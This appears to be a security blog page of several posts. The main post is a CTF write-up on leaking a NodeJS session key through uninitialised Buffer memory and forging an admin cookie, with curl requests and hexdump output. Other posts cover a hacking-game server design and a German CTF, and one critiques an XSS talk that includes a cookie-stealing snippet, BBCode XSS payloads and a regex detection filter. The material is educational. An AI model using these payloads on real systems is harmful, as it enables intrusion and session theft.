NodeJS Hacking Challenge - writeup

Posted on Tue 26 January 2016 in posts • Tagged with ctf, nodejsLeave a comment

You can read the previous article on how to setup and access the NodeJS hacking challenge. I will now spoil the challenge, so if you want to try it yourself, stop reading now!

Scroll down for a TL;DR writeup.

1. getting an overview

index page

When we first access the page we find this nice landing page. I tried to make a lame joke, but also hint at the issue. Languages like C are very prone to memory corruption vulnerabilities, especially when an inexperienced programmer starts writing C code. That's why it's advised, to choose "memory safe" languages for regular projects, or generally languages that make it harder to make mistakes. JavaScript is one of those more safe languages. But the bug that will be exploited here shows, that even in this very high-level language, you might not be as safe as you think you are.

In the menu we can see the items Home, Vexillology and Code. The latter is just a link to the source code

index page

The /admin or private Vexillology area is protected by a big password prompt. When we enter a password we get told that the password is wrong.

index page

When we open the developer console from our browser, we can see that when we enter a password, a POST request to /login is performed with the password as JSON data {"password": "test"}.

Another thing we should pay attention to is the cookie. Infact there are two cookies. session=eyJhZG1pbiI6Im5vIn0= and session.sig=wwg0b0z2AQJ2GCyXHt53ONkIXRs. When you decode the base64 session cookie, you will see that it says {"admin":"no"}. Now you might think that we can simply set this to "yes". But this won't work, because the cookie is HMAC protected. If you change it the server will simply throw it away.

There is a good reason why you would want to store this information in a cookie with the client. This way you can have a stateless server application, and you can easily spin up new machines or do load-balancing without having to think about sharing a database with the session information.

2. code review

Now let's have a look at the source code. A good point to start is the app.js file. We can learn several things from it. First we can see that the app uses the express web framework var express = require('express');. But this doesn't really matter too much here.

We can also have a look into the config.js file, which contains a dummy secret_password and dummy session_keys. Those keys are used to generate the HMAC for the cookies.

Next we should have a look at routes/index.js to see where our requests are handled. And it's really not much code.

router.get('/', function(req, res, next) {
    res.render('index', { title: 'index', admin: req.session.admin });

router.get('/admin', function(req, res, next) {
    res.render('admin', { title: 'Admin area', admin: req.session.admin, flag: config.secret_password });

router.get('/logout', function(req, res, next) {
    req.session = null;
    res.json({'status': 'ok'});
});'/login', function(req, res, next) {
    if(req.body.password !== undefined) {
        var password = new Buffer(req.body.password);
        if(password.toString('base64') == config.secret_password) {
            req.session.admin = 'yes';
            res.json({'status': 'ok' });
        } else {
            res.json({'status': 'error', 'error': 'password wrong: '+password.toString() });
    } else {
        res.json({'status': 'error', 'error': 'password missing' });

You might notice that the secret_password is given as flag to the admin template. If you look at the template code in views/admin.jade you can see that if you were authenticated as an admin, you would get the secret_password.

if admin === 'yes'
    p You are admin #{flag}

The only function that seems to have a bit more functionality is /login. Login checks if a password is set. Then it creates a Buffer() from the password, converts the Buffer to a base64 string, which can then be compare to the secret_password. If that were successful, the session would set admin = 'yes'.

3. the vuln

Somebody with a hacker mindset might immediately try to trace where untrusted userinput is handled. And eventually you would come across the Buffer class. And it turns out that Buffer() behaves differently based on the parameter. You can test this with NodeJS on the commandline:

> Buffer('AAAA')
<Buffer 41 41 41 41>
> Buffer(4)
<Buffer 90 4e 80 01>
> Buffer(4)
<Buffer 50 cc 02 02>
> Buffer(4)
<Buffer 0a 00 00 00>

You can see that when Buffer is called with a string, it will create a Buffer containign those bytes. But if it's called with a number, NodeJS will allocate an n byte big Buffer. But if you look closely, the buffer is not simply <Buffer 00 00 00 00>. It seems to always contain different values. That is because Buffer(number) doesn't zero the memory, and it can leak data that was previously allocated on the heap.

This is the issue that recently surfaced. NodeJS issue #4660 discusses the issue and possible fixes. And yes, there were real-world packages affected.

So becaue we have a JSON middleware (app.use(bodyParser.json())), we can actually send POST data that contains a number. And when you do that, the API will return some memory that is leaked from the heap:

curl -X POST -H "Content-Type: application/json" --data "{\"password\": 100}" | hexdump -C
00000000  7b 22 73 74 61 74 75 73  22 3a 22 65 72 72 6f 72  |{"status":"error|
00000010  22 2c 22 65 72 72 6f 72  22 3a 22 70 61 73 73 77  |","error":"passw|
00000020  6f 72 64 20 77 72 6f 6e  67 3a 20 69 73 41 72 72  |ord wrong: isArr|
00000030  61 79 2f ef bf bd 71 ef  bf bd 5c 75 30 30 30 30  |ay/...q...\u0000|
00000040  5c 75 30 30 30 30 5c 75  30 30 30 30 5c 75 30 30  |\u0000\u0000\u00|
00000050  30 30 5c 75 30 30 30 30  5c 75 30 30 31 30 ef bf  |00\u0000\u0010..|
00000060  bd 43 5c 75 30 30 30 33  5c 75 30 30 30 30 5c 75  |.C\u0003\u0000\u|
00000070  30 30 30 30 5c 75 30 30  30 30 5c 75 30 30 30 30  |0000\u0000\u0000|
00000080  5c 75 30 30 30 31 3c 2f  70 72 65 3e 3c ef bf bd  |\u0001</pre><...|
00000090  7f 43 5c 75 30 30 30 33  5c 75 30 30 30 30 5c 75  |.C\u0003\u0000\u|
000000a0  30 30 30 30 5c 75 30 30  30 30 5c 75 30 30 30 30  |0000\u0000\u0000|
000000b0  5c 75 30 30 30 37 5c 75  30 30 30 30 5c 75 30 30  |\u0007\u0000\u00|
000000c0  30 30 5c 75 30 30 30 30  2f 68 74 6d 5c 75 30 30  |00\u0000/htm\u00|
000000d0  30 32 5c 75 30 30 31 32  d0 a3 5c 75 30 30 30 30  |02\u0012..\u0000|
000000e0  5c 75 30 30 30 30 5c 75  30 30 30 30 5c 75 30 30  |\u0000\u0000\u00|
000000f0  30 30 5c 75 30 30 30 30  5c 75 30 30 30 30 5c 75  |00\u0000\u0000\u|
00000100  30 30 30 30 5c 75 30 30  30 30 76 65 5c 75 30 30  |0000\u0000ve\u00|
00000110  30 30 5c 75 30 30 30 30  ef bf bd 7f 43 5c 75 30  |00\u0000....C\u0|
00000120  30 30 33 5c 75 30 30 30  30 5c 75 30 30 30 30 5c  |003\u0000\u0000\|
00000130  75 30 30 30 30 5c 75 30  30 30 30 5c 75 30 30 30  |u0000\u0000\u000|
00000140  30 5c 75 30 30 30 30 5c  75 30 30 30 30 5c 75 30  |0\u0000\u0000\u0|
00000150  30 30 30 5c 75 30 30 30  30 5c 75 30 30 30 30 5c  |000\u0000\u0000\|
00000160  75 30 30 30 30 5c 75 30  30 30 30 ef bf bd ef bf  |u0000\u0000.....|
00000170  bd ef bf bd 5c 75 30 30  30 30 5c 75 30 30 30 30  |....\u0000\u0000|
00000180  5c 75 30 30 30 30 5c 75  30 30 30 30 5c 75 30 30  |\u0000\u0000\u00|
00000190  30 30 3a 5c 75 30 30 30  36 5c 75 30 30 30 30 5c  |00:\u0006\u0000\|
000001a0  75 30 30 30 30 ef bf bd  5c 75 30 30 30 30 5c 75  |u0000...\u0000\u|
000001b0  30 30 30 30 5c 75 30 30  30 30 50 32 31 5c 75 30  |0000\u0000P21\u0|
000001c0  30 30 33 22 7d                                    |003"}|

When you do this often enough, at some point you will leak one of the session_keys:

curl -X POST -H "Content-Type: application/json" --data "{\"password\": 100}" | hexdump -C
00000000  7b 22 73 74 61 74 75 73  22 3a 22 65 72 72 6f 72  |{"status":"error|
00000010  22 2c 22 65 72 72 6f 72  22 3a 22 70 61 73 73 77  |","error":"passw|
00000020  6f 72 64 20 77 72 6f 6e  67 3a 20 41 4c 4c 45 53  |ord wrong: ALLES|
00000030  7b 73 65 73 73 69 6f 6e  5f 6b 65 79 5f 4b 2e 47  |{session_key_K.G|
00000040  4b 51 65 52 30 4a 53 32  62 39 4f 68 77 53 48 23  |KQeR0JS2b9OhwSH#|
00000050  55 64 4d 68 4c 34 45 64  64 78 65 44 3f 7d 72 64  |UdMhL4EddxeD?}rd|
00000060  41 70 70 7b 5c 22 61 64  6d 69 6e 5c 22 3a 5c 22  |App{\"admin\":\"|
00000070  6e 6f 5c 22 7d 3e 69 3c  21 44 4f 43 54 59 50 45  |no\"}>i<!DOCTYPE|
00000080  20 68 74 6d 6c 3e 3c 68  74 6d 6c 20 6e 67 2d 61  | html><html ng-a|
00000090  70 70 3d 22 7d                                    |pp="}|
curl -X POST -H "Content-Type: application/json" --data "{\"password\": 100}" | grep ALLES                           1 ↵
{"status":"error","error":"password wrong: ALLES{session_key_K.GKQeR0JS2b9OhwSH#UdMhL4EddxeD?}><lin{\"admin\":\"no\"}eet\" href=\"/stylesheets/style."}

Leaked session key: ALLES{session_key_K.GKQeR0JS2b9OhwSH#UdMhL4EddxeD?}

Why can the session key be leaked here? And why can I not leak the secret password? I only have some assumption for the latter, and that is, that the hardcoded password is somewhere in the memory area that is mapped when the JIT compiler takes care of the JS code. But the Buffer() allocated memory area is somehwere else.

The NodeJS app uses cookie-session var session = require('cookie-session'). Which has a dependency to cookies, which has a dependency to keygrip. And keygrip does the HMAC signature by using the node core crypto package. And crypto creates a Buffer from the key. This means that an old session key could be leaked from memory.

With this session key we can now simply create a {"admin": "yes"} cookie with a valid signature. Which allows us to get access to the private area. You can do that by using the source code of this app, change the session_key in config.js and set the default cookie to req.session.admin = 'yes' in app.js.

Then you can grab the values from your modified local application, and simply set those cookies for the challenge server: session=eyJhZG1pbiI6InllcyJ9 and session.sig=oom6DtiV8CPOxVRSW3IFtE909As.

admin access

And now we can decode the base64 flag, which is our secret_password:


TLDR: send a number as password to get a memory leak from NodeJS Buffer(number). POST /login {"password": 1000}. With a couple of tries you should leak the session key, which can be used to create a new valid signed cookie with {"admin": "yes"}. Win!

Fun Fact: this application is probably also vulnerable to a timing attack: password.toString('base64') == config.secret_password

NodeJS Hacking Challenge

Posted on Fri 22 January 2016 in posts • Tagged with ctf, nodejsLeave a comment

I really like to play CTFs (hacking games), because I always learn something new. But sometimes it's also fun to create a challenge yourself. A couple of days ago a nice NodeJS issue surfaced on my twitter feed and because I didn't have a lot of experience with NodeJS, I thought it would be a cool idea to learn more about it, by creating a challenge around it.

At the time of writing this blog post, I still host the challenge on a disposable VM at The source code is available for download here. This website has a restricted area /admin that requires a password to login.

The goal is to successfully gain access to the restricted area and find the secret_password. The source code contains a dummy password and keys, which are obviously different on the actual challenge server. But they are easy identifiable because they follow the same format ALLES{...}. So you know when you got it.

If you stumble across this post at some point in the future and my VM is probably not running anymore, you can just host it locally. Make sure you have NodeJS and npm installed. In case something changes in the future, I am running following versions:

$ cd nodejs_chall
$ node -v
$ npm -v
$ npm install # install dependencies
$ npm start # start server on

If you want to give it a try yourself, you should stop reading now!

If you already tried everything (ALLES!), but you couldn't find the issue, read the follow up article.

Creating a Hacking Game - Part 2: The System

Posted on Sun 09 August 2015 in posts • Tagged with ctf, grackerLeave a comment

For an introduction to my hacking game, checkout: Creating a Hacking Game - Part 1: Introduction

Creating this system was an interesting challenge - the main threat vector are root exploits. I'm not a sysadmin and my Linux knowledge is not very in-depth. But I'm still pretty confident in my design. So now I want to go over every design decision.

> The whole setup is currently running on a very cheap vServer running a 64bit Debian

I got a cheap vServer because I didn't want to pay a lot of money for something nobody will use. And I chose Debian because that's the OS I'm most familiar with on a Server. But the distro shouldn't really matter as you will see soon.

> Chroot Jail for the game:

I wanted to separate the game from the real system and chroot seemed like a very good choice to handcraft the system. This can be easily done with sshd:

Match user level*
    PasswordAuthentication yes
    chrootdirectory /var/sshjail/

This means that all players will chroot to /var/sshjail and they should only be able to access the files inside that folder. So the whole system may look like this:


But when the level0 player is logged in ls / will only list:


This allows me to handcraft the filesystem used by the players and limit the attack surface.

> No access to potential dangerous stuff like /proc and setuid binaries:

Being able to setup the filesystem how I want, I can choose to not mount /proc or /dev. There is no reason why a user should have access to /proc/kallsyms and know where kernel symbols are. I pulled up a random root exploit on the ExploitDatabase and it relies on access to /proc.

It's a lot of work to copy all the files necessary for a Linux system into the chroot jail. I need to copy every binary, including the shell itself and ls, cd, ... . But not only that, all the libraries like libc have to be copied as well. But this allows me to carefully control to what binaries users have access too and exclude any setuid root binaries. setuid binaries are another way how a root exploit could be achieved - so better remove those.

> Use Linux file attributes prevent players modifying or deleting files, even though they are the owner of them:

The game relies on setuid binaries for levels. So for example you exploit the /matrix/level1/level1 binary that belongs to user level2, so when you exploit it, that you have the rights of level2. But when you login as level2 you should not be able to delete or modify that binary - that would destroy the game. You should also not be able to create files anywhere, even in your home folder. That's why I use Linux file attributes to control this.

Here as an example level1. The owner of the level1 binary is user level2 but the group is still level1, together with the setuid bit s the user level1 can execute the binary but it will run as level2. Additionally the immutable file attribute i is set so that even the owner level2 cannot modify it.

ls -l /matrix/level1
total 12
-r-sr-x--- 1 level2 level1 level1
$ lsattr ./matrix/level1
----i--------e-- ./matrix/level1/level1

Same goes for the files in the home folder of the user. They all belong to level1 but they are immutable. You may notice that the iwashere file has the write permission for the level1 owner and that the file attribute is append only a. This allows the user to add a line to the file with for example echo "samuirai was here" >> /home/level1/iwashere but the user cannot delete or overwrite it.

$ ls -l /home/level1/*
-rw-r----- 1 level1 level1 /home/level1/iwashere
-r--r----- 1 level1 level1 /home/level1/recap
-r--r----- 1 level1 level1 /home/level1/story
-r--r----- 1 level1 level1 /home/level1/welcome
$ lsattr /home/level1/*
-----a-------e-- /home/level1/iwashere
----i--------e-- /home/level1/recap
----i--------e-- /home/level1/story
----i--------e-- /home/level1/welcome

> iptable firewall rules to stop users from abusing the server:

I use fail2ban against ssh password bruteforcing. And I block all outgoing connections from the players, so that the server cannot be abused for DoS attacks.

Chain OUTPUT (policy ACCEPT)
target  prot  opt  source    destination
REJECT  all   --   anywhere  anywhere     owner UID match level0 reject-with icmp-port-unreachable
REJECT  all   --   anywhere  anywhere     owner UID match level1 reject-with icmp-port-unreachable

> Set user limits:

I mainly just copied the values from, because I have no idea what good values are. For example the limit of 40 -u processes prevents fork bombs.

[email protected]:~$ ulimit -a
-t: cpu time (seconds)              unlimited
-f: file size (blocks)              unlimited
-d: data seg size (kbytes)          unlimited
-s: stack size (kbytes)             8192
-c: core file size (blocks)         0
-m: resident set size (kbytes)      100000
-u: processes                       40
-n: file descriptors                1024
-l: locked-in-memory size (kbytes)  64
-v: address space (kbytes)          2000000
-x: file locks                      unlimited
-i: pending signals                 7976
-q: bytes in POSIX msg queues       819200

> Remaining threats:

One issue will always be root exploits like the recent CVE-2015-3290. But I hope the restricted filesystem together with the virtualized vServer will protect me from the majority.

The other big issue are race conditions in setting up new levels or making changes to current levels. When I make changes to levels I cannot make these atomic. I have to remove the immutable attribute, modify a file and readd the attribute. There is a window of opportunity where an attacker could make a mess. But this can be avoided by blocking ssh access, killing all processes from players, do the changes and allow them back in.

Creating a Hacking Game - Part 1: Introduction

Posted on Sat 08 August 2015 in posts • Tagged with ctf, grackerLeave a comment

This is a multi-part blog post about creating my own hacking game to teach other people the excitement of exploiting vulnerabilities. To try it out, just connect to ssh [email protected] with password level0. You only need a little bit of Linux command line knowledge. And get used to google a lot ;)

$ ssh [email protected]
      __                  _
     / /                 | |
    / /_ _ _ __ __ _  ___| | _____ _ __
   / / _` | '__/ _` |/ __| |/ / _ \ '__|
  / / (_| | | | (_| | (__|   <  __/ |
 /_/ \__, |_|  \__,_|\___|_|\_\___|_|
      __/ |
             ~ follow the white rabbit ~
                     ~ gracker ~
            ~  #gracker ~
[email protected]'s password: level0

On Linux or Mac just open a terminal and type that command in. If you are on Windows you can use PuTTY.


In 2012 I came across Capture the Flag by stripe. At that point I knew a little bit of assembler - I knew a little bit how the stack works and I kinda knew what a buffer overflow is. But I had never seen or exploited one myself. The CTF hooked me and I was so eager to solve those challenges. With a lot of time and googling I was able to solve the levels and got a T-Shirt that I wear proudly to this day. As stripe's blog post mentions, they were inspired by So I moved on to io and til this day I haven't finished all the levels. I believe I'm stuck on level 17 - but I always come back to it and realize that I learned more and can solve the next level.

So over time I have played some other CTFs - as you can see from my HITCON CTF 2014 sha1lcode writeup


I have this character flaw, that I get super obsessed with stuff. And I can never understand why other people are not interested in something I'm so enthusiastic about. So I guess in an attempt to get more people into this field that gives me so much excitement I wanted to create my own game - a game that is dedicated to beginners with a slow skill curve, so they don't get frustrated too quickly (though, that is part of the fun).

For an overview on how the game works, here is the README that you can access when you login as level0:

[email protected]:~$ cat README

│ How it works...                                                           │
│ This is a hacking game. The goal is to hack from level to level.         │
│                                                                          │
│ You are currently level0. The password of your current level can be      │
│ found in ~/.pass                                                         │
│    + run `id` to display your current user id                            │
│    + display your current password `cat /home/level0/.pass`              │
│                                                                          │
│ So your goal is to find the password for the next level (level1). With   │
│ the password you can then connect to the next level                      │
│    + `ssh [email protected]` to login with the found password           │
│                                                                          │
│ The level relevant files can be found under /matrix                      │
│    + display the files for level0 `ls /matrix/level0/`                   │
│                                                                          │
│ A good point to start is to read the "story" in your home folder. It     │
│ will give some motivation for the current level, it will tell you what   │
│ files are necessary and maybe give additional info.                      │
│    + display current story `cat ~/story`                                 │
│                                                                          │
│ Sometimes there is a story recap available, which contains additional    │
│ information about the challenge that you just solved. Usually this means │
│ you will discover new tools or techniques how to solve a challenge. If   │
│ you have a particular nice solution that you would like to share,        │
│ contact me, and I might add it.                                          │
│    + display the demo recap `cat ~/recap`                                │
│    + the recap for level0 is in `cat /home/level1/recap`                 │
│       (you need to get access to level1 before you can read it)          │
│                                                                          │
│ To show people that you made it to a particular level, you can add your  │
│ nickname, messages and secrets to the "iwashere" file. You can only read │
│ and append something to the file.                                        │
│    + show the world that you found this game:                            │
│      `echo "I made this. ~samuirai" >> ~/iwashere`                       │
│    + look at who was in level0 `less ~/iwashere` or `cat ~/iwashere`     │
│                                                                          │
│ Most important point. Have fun. The worst thing that can happen is, that │
│ you accidentally learn something.                                        │
│ Rules and System Info                                                     │
│   1. Do not DoS this or any other system. Don't be a kiddy!              │
│   2. Do not connect to remote systems from this.                         │
│   3. Do not use too many resources. This is a very small server.         │
│   4. Do not spoil challenges (no writeups!), but helping newbs good.     │
│   5. Be excellent.                                                       │
│   - levels can be found under /matrix                                    │
│   - You can only write to /tmp.                                          │
│   - Unused files and folders in /tmp are deleted after a few hours.      │
│   - If you want to have a specific tool installed, contact me.           │
│   - If you find bugs, please contact me.                                 │
│ Start                                                                     │
│ 1. read the story for your current level                                 │
│     `less ~/story`                                                       │
│ 2. find the files in `ls /matrix/level0`                                 │
│ 3. create a working directory in /tmp to develop scripts and tools       │
│ 4. solve the challenge and get the password                              │
│ 5. login as level1                                                       │
│ 6. read the recap for this level                                         │
│     `cat ~/recap`                                                        │
│ 7. read the story for level1 and solve the next challenge                │

Continue to Part 2: Creating a Hacking Game - Part 2: The System

Cyber Security Challenge Germany 2014

Posted on Sat 14 February 2015 in posts • Tagged with ctf, cscgLeave a comment

This is about my experience of the Cyber Security Challenge Germany 2014.

The Cyber Security Challange Germany is a Capture The Flag style competition for students which I participated in. It is mainly organised by the Internet Sicherheit Institut (ger.: Internet Security Institution) and Compass Security with support from many companies as well as the german Federal Ministry for Economic Affairs and Energy.

It all started in November 2014 with an online qualification on, where we had to solve different challenges and collect points. The challenges were different from the typical CTF jeopardy style where you only have to find a flag. At hacking-lab you always have to write a report which will be reviewd by people. Also due to the fact that it was not only intended for experienced university students, but also for much younger highscool students (<18 y/o), many of the challenges were not that difficult - in the end all qualified uni students had solved all challenges. I'm also quite resentful that there was not a single pwning (binary exploitation) challange and the only reverse engineering challange was a very simple XOR encryption and we had FOUR captcha breaking challenges :P But it was fun nonetheless.


Once the deadline was over, the 20 best students were invited to Berlin to participate in a live hacking competition in the beginning of February 2015. We got divided randomly into 4 teams with 5 people per team. Two university student (Studenten) teams and two highschool student (Schüler) teams. I got very lucky with my team, because we complemented eachother very well. easysurfer for example has a lot of experience with reversing on windows and he was able to solve a mean challenge really fast, or EPG who has experience with patching java byte code in android apps solved a game hacking task super fast. So we were able to solve a lot of tasks pretty quickly.

In my opinion the challanges for the live hacking competition were a lot more fun than the one from the quialification round. Especially because we had a bunch of very cool reversing challenges. Unfortunately I can't do a writeups, because the challanges may get reused for other events :(

Here is a picture from our Team Orange in the middle of the competition:

team orange

Once a team solved a challenge and got awarded the points, the other teams had only 1h left to solve it. When the deadline passed, the other teams had to give up those points and move to another challenge - so it was quite strategic where you spend your time on. Because we were so quick with some of the tasks, we were able to establish quite a lead :P

When I talked to many of the students who participated, they actually didn't do much or, anything at all, regarding hacking. So this event motivated many of them to look into security and discover a new passion - which is pretty awesome.

In the end our Team Orange won the Cyber Security Challenge Germany 2014 and we all got new ThinkPad T440p - which I gave to my significant other, because she always supports me and she has to tolerate those hours over hours I neglect her to pursue my dreams. Thank you!

Criticism - Revisiting XSS Sanitization

Posted on Sat 18 October 2014 in posts • Tagged with xss, security, bheu, criticismLeave a comment

This is a criticism about Ashar Javed's BlackHat EU Talk: Revisiting XSS Sanitization.

I believe as in any field of science we need to have a discussion about published research. Especially when we think there is something wrong with the "experiments" and the resulting conclusion. Maybe I'm completly overlooking something, but at this point I don't even understand how this talk got accepted to a renowned conference like Black Hat.

First I want to give a quick summary of what Ashar Javed claims. Then I want to talk about what I thought is the consensus of the security community regarding XSS. And at the end I want to evaluate his conclusion/solution. Unfortunately I haven't seen his talk, so I can only read his paper and guess what he said during those 168 slides.

sha1lcode calltree

Research Summary

Basically he claims that he found Cross-site Scripting exploits in the top 25 online WYSIWYG editors with.

But what exactly did he exploit? He says,

The third-party WYSIWYG editors are normally available in the form of client-side JavaScript library, PHP or ASP based sever-side component and Rails gem.

So we already have multiple components - the client-side editor and sometimes a server side script that handels the input. And he is not clear about what component he exploited.

This is an example data flow. A user creates a post using a WYSIWYG editor, sends the post to the server where it get's stored in a database. And when another user wants to read the post, the server purifies/encodes the post properly, so it can be safely rendered in the user's browser: sha1lcode calltree

Let's go over each possible exploitation scenario:

1. Exploiting the Javascript Editor

1.1 Edit/Quoting Functionallity

Let's assume there is a sanitized, completly safe, forum post like this:

sha1lcode calltree

But when another user would want to [Quote] your post, and by doing so automatically copies the string into his WYSIWYG editor and it executes the javascript, then we have a minor XSS issue.

Is this one of his attacks? I'm not sure.

1.2 Self-XSS

Self-xss means a user get's tricked into hacking himself. This works against really stupid unknowing people and is for example an issue for facebook - I could tell a 14 y/o kid that he can get free FarmVille credits when he presses F12 to access the "cheat console" (Developer Toolbar: F12, cmd+opt+I), and pastes this snippet:

new Image().src=""+encodeURI(document.cookie);`

Of course the developer console ist very obvious. So with a WYSIWYG editors you can maybe exploit some functionallity that causes javascript to be executed. For example if I can enter javascript:alert(1) as a URL and it get's rendered (eg. in the Preview) as <a href="javascript:alert(1)">link</a>, I can trick a user to execute that.

[!] Note: this is only on the current page, we haven't saved our text to the server - and we don't know yet how the real output looks like. It's possible that the output is properly sanitized/purified when we submit this link as a post. This means I can trick somebody into a self-xss if I can make them following those steps.

Compare it to the original data flow. This XSS never leaves the first user:


And I believe that most of Ashar Javed's XSS are exactly this. For example his tinymce writeup sounds exactly like that (click on the image to go to his original post):

tinymce xss

Yes it can become a problem (see facebook), but in general I consider it a very very minor issue. Not even worth reporting.

2. Exploiting the server-side script

This time we have the full flow and we store the post on the Server. But it doesn't get properly purified/encoded/sanitized for rendering in the user's browser.

server xss

2.1 Output not properly sanitized

Here is a perfect example by @StackSmashing. Protonmail uses a WYSIWYG editor (but this fact doesn't really matter). @StackSmashing then just edit's the editors generated HTML code and sends it to the server. Instead of properly sanitizing it, the code get's embedded in an email and then executed.

[!] Note: this works with any WYSIWYG editor, when the output is not sanitized. Actually it's wrong saying that this is an issue of the editor. Because whatever the editor may disallow/purify/encodes/sanitizes, an attacker can always send what he want's to the server. The output needs to be safe.

2.2 BB-Code parser

Here is where stuff actually becomes very interesting and fun :3

Some WYSIWYG editors create BBCode rather than HTML. But somewhere this BBCode has to be parsed and translated into HTML. And many people write regex parser for that - which is a horrible idea. As langsec, Chomsky hierarchy and many other examples have taught us, it's impossible to match a context-free (Type-2) language like HTML with a regular language (Type-3) like regex. Thus we can exploit those flawed regex parsers.

Easy XSS could look like this:

[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]

But because of regex parsers, weird stuff like this can help you break out off attribute contexts etc.

[url=[img][/img]] onmouseover=alert(1) foo=bar[/url]after

Here is a post by @kkotowicz about XSS with the TinyMCE WYSIWYG editor bbcode plugin.

And I have also made a talk about hacking a browser game (in german) that includes this kind of attack.

The question is now, does Ashar Javed exploit the parser/sanitizer on the server? I'm not sure. I think hope the XSS that gave him bug bounties were from this kind.

XSS Prevention

As far as I know the consensus of the security community regarding XSS is, that we need to encode data output based on where we put it. For example the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet tells us specific rules based on the context we want put data in.

But WYSISYG editors are a bit special, because websites that use them specifically want to allow certain HTML tags in user input. And this is a nontrivial task! But luckily other people have solved this for us already and there are projects like HTML Purifier or DOMPurify.

Evaluating Ashar Javed's solution

In his BlackHat briefing he promises us ...

... a sanitizer (very easy to use, effective and practical solution) which is based only on '11 chars + 3 regular expressions' and will show how it will safe you from an XSS in HTML, attribute, script (includes JSON context), style and URL contexts.

php xss filter

which seems to be this implementation, published by him in June/July this year.

php filter

It doesn't even make sense here. Because we are talking about WYSIWYG, where we want to allow certain tags. But this filter just encodes everything (read as: doesn't allow ny tags). This doesn't help preventing all the server side parsing/purify difficulties we have with complex html.

Additionally he publishes another solution - a javascript based filter. Does this help to prevent the client-side (self-xss) issues of all those WYSIWYG editors he exploited?

js xss filter

Nope. Of course not. This is what he does:

function test(string) {
    var match = /<script[^>]*>[\s\S]*?/i.test(string) ||
         /[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/i.test(string)  ||
         /(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/i.test(string) || 
         /%[\d\w]{2}/i.test(string) ||
         /&#[^&]{2}/i.test(string) || 
         /&#x[^&]{3}/i.test(string) ||  
         /&colon;/i.test(string) ||
         /[\s\S]src[\s\S]/i.test(string) ||
         /[\s\S]data:text\/html[\s\S]/i.test(string) ||
         /[\s\S]xlink:href[\s\S]/i.test(string) ||
         /[\s\S]base64[\s\S]/i.test(string) || 
         /[\s\S]xmlns[\s\S]/i.test(string) ||
         /[\s\S]xhtml[\s\S]/i.test(string) || 
         /[\s\S]href[\s\S]/i.test(string)  || 
         /[\s\S]style[\s\S]/i.test(string) ||
         /[\s\S]formaction[\s\S]/i.test(string) ||
         /[\s\S]@import[\s\S]/i.test(string) || 
         /[\s\S]!ENTITY.*?SYSTEM[\s\S]/i.test(string) ||
         /[\s\S]pattern(?=.*?=)[\s\S]/i.test(string)  ||
         /<style[^>]*>[\s\S]*?/i.test(string) ||    
         /<applet[^>]*>[\s\S]*?/i.test(string) || 
         /<meta[^>]*>[\s\S]*?/i.test(string) || 
         /<form[^>]*>[\s\S]*?/i.test(string) ||
         /<isindex[^>]*>[\s\S]*?/i.test(string) ||
         /<object[^>]*>?[\s\S]*?/i.test(string) || 
    return match ? 'Filter has catch your awesome vector ... Try hard  :(' : 'Bypass :)';

This filter has so many false positives. I can't even write a simple text like: "do you know base64?". And yeah, it allows some tags like <b>bold</b>. But it doesn't solve the more difficult challenge that HTML purifier face - allowing a lot of different tags with attributes, etc.

filter false positive

It's another "solution", which in reality is not a solution.

As I mentioned, I haven't watched his talk, but based on the slides it seems like he even makes fun about what the developers say. But I have to agree with them (see 2.1 Output not properly sanitized) - because an attacker can pass any input to the server. It doesn't matter what the capabilities of a WYSIWYG editor are.

developer comments

My conclusion

Ashar Javed's is not very clear about what he actually did. I believe most of his XSS were just self-xss. And even if it was more than that (see my overview 1. - 2.) it is still old and known stuff.

Besides that, the "solutions" he provided are not solutions for his issues. Neither on the server-side nor on the client-/editor-side do they sanitize/purify HTML to allow harmless tags -> which is the real challenge.

I mean it's not necessarily wrong what he says. It just doesn't make a lot of sense in this context and it's not really new.

It could be a nice paper if it would include which parts he actually exploited. So that WYSIWYG editor (and backend) developers can actually learn from the mistakes of others.

In the end I don't understand how this got accepted by the BlackHat EU reviewers...

Now I want to finish with the quote of a friend:

If you wrap it into a confusing cloud of half-true content you can get quite far


To keep it fair Ashar Javed received this article as a draft to be able to comment about it beforehand. He also gave the permission to publish his answers here, which is great for transparency.

I will not make any additional comments to what Ashar replied, because in my opinion it doesn't change anything about what I said above.

.mario sends the following email to Ashar:

Hello Ashar,

we had a look at your BlackHat presentation and paper and developed doubts about its content and reasoning.

We discussed it internally and couldn't arrive at a point where it all makes sense. That holds for both the attacks as well as the proposed defense.

We will publish a written criticism very soon but wanted to give you a chance to preview and comment this. [...]

While not written by me, I agree with all mentioned in there and believe it is right.

Your comment on that is welcome.


Ashar Javed answers:


I can give you a point-wise or line-by-line feedback but for this I need more time.

The case study about WYSIWYG editors is a general study and it includes server-side, client-side and different programming languages WYSIWYG editors (in PHP. ASP, Rails, JavaScript and JQuery-based etc). I discussed the results in general and they are not specific to client or server side.

It is a debatable issue that client-side sanitization will be there or not ... I found Froala WYSIWYG editors developers were very keen in sanitizing stuff on the client side but on the other hand CKEditor developer said to me that it is a server-side problem. I used developers' comments in the slides not for FUN but I wanted to convey that developers of WYSIWYG editors want server-side sanitization while developers of server-side web applications take the product and start using it without adding sanitization stuff which makes the sites vulnerable. I had given examples of Twitter, CNET, Ebay etc ...

Fabian had written that bug in Tiny-MCE is not even worth reporting but my question is that why developers are keen in fixing it quickly ... For my 1000 USD bounty from Magento (BB-code in use), as far as I know, everything is happening on the server-side and for me it was a black-box text.

Down below I will try to make some points clear so that you will have a better understanding of the slides. I think the confusion arise because you had seen:

and then jump to the conclusion.

This was a demo where for the sake of demo, I used the client-side code and the regular expressions are in JavaScript.

What I had in my mind and what I wanted to convey and conveyed i.e., "see this filter for harmless tags" is still holds true if you will use the same regular expressions on the server-side.

This filter allows very simple tags like bold,, italic etc. It does not allow links and images. If you look at the Facebook's WYSIWYG editor (I really liked because it is very simple) which is available at: and I mentioned in the slides also:

It also allows simple tags without images and links. The pro of my filter (if used on server-side) is that it is open-source (since last two and half years because it is part of ModSecurity Core Rule Set also) though suffers from false positives (which is a common problem in filtering solutions). Facebook's WYSIWYG editor is not open-sourced but very good in a sense that it has no false positives ... In comparison, there is a trade-off.

